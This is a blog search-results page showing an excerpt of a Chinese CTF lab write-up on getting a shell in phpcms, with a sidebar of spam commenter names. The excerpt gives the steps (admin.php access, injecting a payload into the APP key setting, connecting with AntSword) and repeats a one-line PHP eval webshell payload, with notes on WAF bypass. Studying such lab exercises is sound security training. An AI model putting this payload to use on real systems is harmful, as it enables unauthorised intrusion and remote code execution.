TypechoJoeTheme

mmzkyl

搜索到 1 篇与 phpcms 的结果 ———
2021-11-04

墨者学院靶场_CMS系统漏洞分析溯源(第2题)

墨者学院靶场_CMS系统漏洞分析溯源(第2题)
随笔 2021-11-04 15:47 好像有点 Bug ,上传的木马似乎不能以单引号进行包含,如下形式的木马便不能正常执行 \\',@@eval($_POST['123']),// 2021-11-04 19:38 我觉得应该是存在WAF拦截的 2021-11-04 19:39 在自己创建的shell界面使用编码也无法绕过WAF正常连接,而在search界面通过更改编码便能够正常连接,我也没有一个确切答案 2021-11-04 19:43 测试了一下,将search代码原封不动的复制到shell中,使用编码也是无法正常连接 目标靶场 解题步骤 进入首页 查看一下中间件相关信息 尝试查看 robots.txt 尝试访问 admin.php 直接以超级管理员进入后台界面 准备进行后台 getshell 在 APP key 中插入payload \\',@@eval($_POST[123]),// 先使用hackbar测试一下木马是否有效 使用蚁剑尝试连接 寻找相应的Key提交即可 新的思路 进入模板设置界面 随意选择一个目录并进入...
mmzkyl
2021-11-04

学习笔记

230 阅读
0 评论
2021年11月04日
230 阅读
0 评论

互动读者

  • 在线博彩闲逛

    评论 4 次 | 文章 0 篇

  • slot deposit pulsa闲逛

    评论 1 次 | 文章 0 篇

  • slot633闲逛

    评论 1 次 | 文章 0 篇

  • สล็อต 168 vip闲逛

    评论 1 次 | 文章 0 篇

标签云